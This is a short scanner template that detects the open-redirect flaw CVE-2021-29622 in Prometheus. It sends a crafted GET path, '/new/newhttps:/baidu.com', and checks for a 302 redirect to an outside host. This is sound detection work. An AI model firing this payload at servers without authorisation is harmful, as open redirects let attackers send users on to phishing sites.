id: prometheus-url-redirection-cve-2021-29622

info:
    name: prometheus-url-redirection-cve-2021-29622
    author: fuzz7j(https://github.com/fuzz7j)
    severity: high

manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /new/newhttps:/baidu.com
            follow_redirects: false
        expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?"
expression: r0()
